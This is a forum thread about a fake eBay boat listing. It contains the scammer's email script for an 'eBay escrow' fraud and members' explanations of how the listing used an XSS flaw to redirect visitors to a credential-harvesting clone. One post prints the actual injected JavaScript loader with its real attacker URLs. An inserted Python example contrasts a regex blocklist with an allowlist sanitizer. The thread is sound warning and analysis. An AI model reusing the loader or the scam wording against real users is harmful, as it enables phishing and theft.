Yet another scam auction on ebay

geardownthreegreens

Well-Known Member
Joined
24 Sep 2007
Messages
811
Location
Cheltenham
Just looking as you do and smelled a rat.

A Regal 2250 on ebay, item No. 221114101407, like new with 50hrs on the clock, £9800 or offers.

Now I don't know if it's just my pc, but when I open the advert, the page seems to get covered with an almost identical page, very strange.

Anyway, thought I'd play with this idiot and ask a couple of questions, to which his replies never once answered any of them.
Here are the emails, rather long, sorry!! ;)
What do you reckon, guys? Bargain or scam?


We can use the protection program offered by eBay. The boat will be delivered to your home address. I will pay for the shipping. Standard shipping is usually delivered in 5 business days. You will receive the boat along with the registration document, bill of sale signed and all the original books, full service records and 2 keys. Regarding the money side of things, you will pay to eBay the required amount (£ 9,800), and they will secure it until you get the boat. You will be given a 7-day inspection period during which you can decide whether you keep it or not. If you are satisfied with it, you will confirm that to eBay so they can unblock the funds and send them to me.

In order to move on please send me your full name and complete address. I will post the transaction mentioning the boat details, the price etc. on the eBay website and confirm you as the buyer.

After the transaction is processed they will send you the invoice explaining the procedure.
Thank you,

On Tue, Aug 28, 2012 at 7:26 AM, Simon Gilder <nismoglider@blueyonder.co.uk> wrote:

On 27/08/2012 21:29, Galvin Crosby wrote:
> Hi
> I intend to use the security provided by eBay, because they have a great exchange program. The transaction will be fully under eBay surveillance, giving us both security and insurance that nothing will go wrong. This way you will actually pay for the boat after reception and inspection, considering that the funds will be held in their trust account and released to me only after you accept and confirm the delivery. Do you think a 7-day inspection period will suffice? Within this time frame you have to decide if you purchase it or not. If you decide against the purchase you will be fully refunded without any added charges to your account. The boat will be returned to me if you reject it upon inspection, but I honestly doubt this will happen.
>
> Thank you
>
>
> On Mon, Aug 27, 2012 at 5:10 PM, Simon Gilder <nismoglider@blueyonder.co.uk> wrote:
>
> On 26/08/2012 16:13, Galvin Crosby wrote:
>
> Hello,
>
> For sale: 2009 Regal 2250
>
> Description:
> Regal 2250 with MPI 5L Mercruiser
> For sale, immaculate condition Regal cuddy cabin.
> Like new only 50 hours on clock.
>
> Specifications:
> Vessel type: Sports boat Cuddy
> Designer: Regal
> Builder: Regal Marine
> Make: Regal
> Model: 2250
> Year constructed: 2009
> Berths: 2
> No. of engines: 1
> Engine model: MPI Mercruiser
> Engine power: 260 HP
> Engine hours: 50
> Fuel type: Petrol (Gas)
> Length over all: 22' 6"
> Hull material: Glass Fibre
> Hull type: V Shape Fast Trac Hull
> Hull colour: Black
>
>
> The price is £ 9,800 including delivery/handling.
>
> Let me know if it's what you are looking for.
>
> Thank you
>
> Yes, very interested. When and where can I view the boat? How would you like payment? Cash?
>
> Si
>
>
So where do we go from here??
 
Do not visit that item!

I work in website security.... Based on a quick look it looks like you may have uncovered a serious security flaw in ebay called a Cross Site Scripting flaw (XSS). Somebody has managed to set that item up so that it tricks ebay into loading some javascript code that replaces ebay on screen with an identical copy hosted at a site called fordmotorrs.com.

When you login to send a message etc they harvest your username and password and then use your account to scam you or others. If you've logged in via that page - go back to ebay now via a proper URL and change your password. And then change that password anywhere else you use it - especially PayPal etc.

Best advice if you see something that looks out of place or wrong on the internet is stay away from it. Don't interact with them.

EDIT: I've reported the item/flaw to ebay though looking at google they may already know.
 
Hi James

Many thanks for that. There was me thinking it was perhaps my pc, but no, there is certainly something amiss there, and you have just explained it. You obviously know about this type of thing.
Thanks for letting ebay know, I've tried to do the same so hopefully this will get pulled.


Simon
 
> Hi James
>
> Many thanks for that. There was me thinking it was perhaps my pc, but no, there is certainly something amiss there, and you have just explained it. You obviously know about this type of thing.
> Thanks for letting ebay know, I've tried to do the same so hopefully this will get pulled.
>
> Simon

Well done on spotting something was wrong - an awful lot of people don't :(
 
jamesjeffrey Hi, can you please clarify a question: if putting the item number into "my ebay" item search and looking at the page on ebay (not asking any questions to the seller), have you run any risk? Your answer would be very much appreciated.
One thing that got me suspicious was no "save it" in your search, and the link below the price box would not save it either.

Cheers.
 
> jamesjeffrey Hi, can you please clarify a question: if putting the item number into "my ebay" item search and looking at the page on ebay (not asking any questions to the seller), have you run any risk? Your answer would be very much appreciated.
> Cheers.

There is a small theoretical risk if you were logged in when you did it, but I'd have to look a lot more closely to be sure.

If you are concerned changing your eBay password should mitigate the risk.

The reason for the risk is that sometimes a Cross Site Scripting attack like this one can be used to steal "cookies" from your machine, which eBay uses to identify you. So it might let someone pretend to be you on eBay for a while. Changing your password would invalidate the session cookie which is the most important one, and stop someone from doing this.

Apart from that it's just the general internet advice... run a virus scanner, install windows and browser updates, and if something looks suspicious, avoid.

On this particular item the first giveaway that something was wrong was what the OP spotted - the page loading up twice. If you looked in the URL bar at the top when viewing the item you might see it has replaced ebay with the "fortmotorrs" site.
 
Thanks James for explaining how this works.

I think I may have come across a similar one, I had enquired about a Searay 240 on boatshop 24, asking the seller to confirm the asking price. I asked as it is listed at £7500 and £15000 in a separate listing, the same boat appears on a broker's site for over £20K (which is probably about right). The "seller" emailed me to say the price was £7500 and if I was interested, they would list it on ebay so I could have their excellent protection etc. Figured it was a scam but had no idea how it worked up until now.

That listing is still on boatshop 24, should I report this?
 
Thanks James.
I have now changed my ebay ID.
Many thanks for your help.
Maybe a post in the lounge will help others.
In fact it's an important enough issue to post right across all the forums, if not already done.
I have no doubt comments from Brendan will also be helpful.

also Quote:-
If you looked in the URL bar at the top when viewing the item you might see it has replaced ebay with the "fortmotorrs" site.

I did not see any top bar reload,
but I am not going there again anyway.:D

Thanks again James.
 
> Thanks James for explaining how this works.
>
> I think I may have come across a similar one, I had enquired about a Searay 240 on boatshop 24, asking the seller to confirm the asking price. I asked as it is listed at £7500 and £15000 in a separate listing, the same boat appears on a broker's site for over £20K (which is probably about right). The "seller" emailed me to say the price was £7500 and if I was interested, they would list it on ebay so I could have their excellent protection etc. Figured it was a scam but had no idea how it worked up until now.
>
> That listing is still on boatshop 24, should I report this?

YES YOU SHOULD.

I'm always spotting these ads on boatsandoutboards and reporting them. Next day, generally, they have gone. They are easy to spot because they halve the price. Email them to get a stupid response where they talk about listing on ebay (as you said) for the protection.
Personally I think you'd have to be a right dumbass to fall for it but I guess people do. Just wish I could get my hands on these people.

The auction, by the way, on ebay is still running with the cloned page. Why do I bother speaking to ebay!!!!
 
It's a simple scam, but how on earth do ebay allow script to get into an advert page?

Main page script writes out a redirection script ...

<script type="text/javascript">
var
a = "SRC=";
b="http://ruversbay.com/i/m36.js";
c="</";
d="script";
document.write ("<script type='text/javascript'"+a+b+">"+c+d+">");
</script>


... which then redirects you to the scam site.

window.top.location.href = "http://fordmotorrs.com/itm/Regal-2250-with/221114101407/username/not";
 
> It's a simple scam, but how on earth do ebay allow script to get into an advert page?
>
> Main page script writes out a redirection script ...
>
> <script type="text/javascript">
> var
> a = "SRC=";
> b="<snip>";
> c="</";
> d="script";
> document.write ("<script type='text/javascript'"+a+b+">"+c+d+">");
> </script>
>
> ... which then redirects you to the scam site.
>
> window.top.location.href = "<snip>";

This kind of problem is actually pretty common - they presumably have a bug in the code filtering user input when someone adds or edits the item, and someone has found a way to use that bug to get around the filter.

These flaws (XSS) are on sites all over the internet and happen often enough to have made it into the industry bible, the Open Web Application Security Project (OWASP) Top 10, at number 2 - see https://www.owasp.org/index.php/Top_10_2010-A2

I reported it to the eBay security researcher mailbox - I've had a reply from a human saying their engineers are looking at it.

Though I imagine FlowerPower took proper precautions (using a specialist tool rather than a browser etc) when looking at this... If anyone else is considering going to look I would strongly advise them not to. Right now it just looks like it's designed to try and steal your eBay login or part you with some boat money - but they could easily change it to have a good go at putting a virus/trojan onto your computer and cause a lot more problems for you - especially with the recent security problem found in the Java plugin installed on most people's computers.

If you don't go looking for something "dodgy" then the internet is generally fairly safe... but there are exceptions. Both your average fraudster and also technical security risks like these. If something seems dodgy best to just stay away from it :)
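As an added illustration of James's point about the input filter (this is not code from the thread, eBay or anyone posting here): a blocklist that only rejects a literal external-script tag never sees one in the fragment-built loader FlowerPower quoted, whereas an allowlist sanitizer that rebuilds the listing from known-safe tags drops the whole element. The listing body is constructed and the script address is a placeholder, so nothing is fetched.

```python
import re
from html import escape
from html.parser import HTMLParser
# Constructed listing body modelled on the fragment-built loader quoted in the
# thread; the remote address is a placeholder, so nothing is ever fetched.
LISTING_HTML = """<p>Regal 2250, like new, 50 hours.</p>
<script type="text/javascript">
var a = "SRC="; b = "http://example.invalid/m.js"; c = "</"; d = "script";
document.write("<script type='text/javascript'" + a + b + ">" + c + d + ">");
</script>
<img src="boat.jpg" onerror="alert(1)">"""

# Blocklist approach: reject a literal external-script tag. The loader above
# never contains "<script ... src=" as text, so this filter lets it through.
NAIVE_BLOCK = re.compile(r"<script[^>]*\ssrc=", re.IGNORECASE)
def naive_filter_catches(html: str) -> bool:
    return bool(NAIVE_BLOCK.search(html))

class AllowlistSanitizer(HTMLParser):
    # Allowlist approach: rebuild the markup from known-safe tags/attributes only.
    ALLOWED_TAGS = {"p", "b", "i", "ul", "li", "br", "img"}
    ALLOWED_ATTRS = {"img": {"src", "alt"}}
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip_depth = [], 0   # skip_depth > 0 inside <script>/<style>
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1            # drop the element and all its text
        elif tag in self.ALLOWED_TAGS:      # any other tag is dropped, text kept
            kept = ""
            for name, value in attrs:
                value = value or ""
                if name in self.ALLOWED_ATTRS.get(tag, ()) and not value.lower().startswith("javascript:"):
                    kept += f' {name}="{escape(value, quote=True)}"'
            self.out.append(f"<{tag}{kept}>")
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in self.ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))   # text is re-escaped, never trusted

def sanitize(html: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

Real sites should use a maintained sanitizer library and a Content Security Policy rather than a hand-rolled parser; the point here is only that allowlisting, not pattern-matching, is what closes the gap.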
 
>>Though I imagine FlowerPower took proper precautions
Bog standard Firefox browser with HTTPFox, but run in a "disposable" virtual machine.

>>especially with the recent security problem found in the Java plugin installed on most people's computers.
I have removed all traces of Java plugins from my office laptop! Simply visiting a dodgy site with the vulnerable plugin can cause all sorts of nasties to be uploaded. I ended up having to reformat and reload the OS on a friend's daughter's laptop because of this (it was too far gone, too many executables missing, no OS backup :-( )
 
> YES YOU SHOULD.
>
> I'm always spotting these ads on boatsandoutboards and reporting them. Next day, generally, they have gone. They are easy to spot because they halve the price. Email them to get a stupid response where they talk about listing on ebay (as you said) for the protection.
> Personally I think you'd have to be a right dumbass to fall for it but I guess people do. Just wish I could get my hands on these people.
>
> The auction, by the way, on ebay is still running with the cloned page. Why do I bother speaking to ebay!!!!

Email sent to them but I imagine that a good percentage of these adverts could be bogus. Obviously some people fall for it or these fraudsters wouldn't bother wasting their time posting ads.
 
Hi there, forgive jumping in on this as a newbie (I do sail a bit, and a fanatical windsurfer so a ybw cousin maybe?). I saw an eBay ad for a really nice Mercedes and emailed the seller today to ask a bunch of questions. The guy responded quickly and answered most, but importantly didn't answer my question about where he was based, so I got a bit suspicious and googled his name - Galvin Crosby. His sign-off to the email was identical to the one the OP had, so it's the same scam, just a different item on eBay.

For my own peace of mind, please can you tell me whether I should still be worried. I've changed my eBay and PayPal passwords tonight - about 2 hours after he emailed me back. Should I change my email password too? My eBay password was different from any other passwords I have, but I use my email one for a few shopping sites. I don't really get the full details of the scam, but can he wreak havoc on my pc now or have I headed him off at the pass by changing my eBay password? I did think it a bit weird that when I clicked 'send question to seller' on eBay, I didn't have to log in or give any passwords, but I did have to fill in my email address - hence my question about having to change my email password.

All help gratefully received, as frankly I'm $hitting myself that my whole life is about to be stolen by some ar$hole!

I know it's my first post, but I am genuine :o
 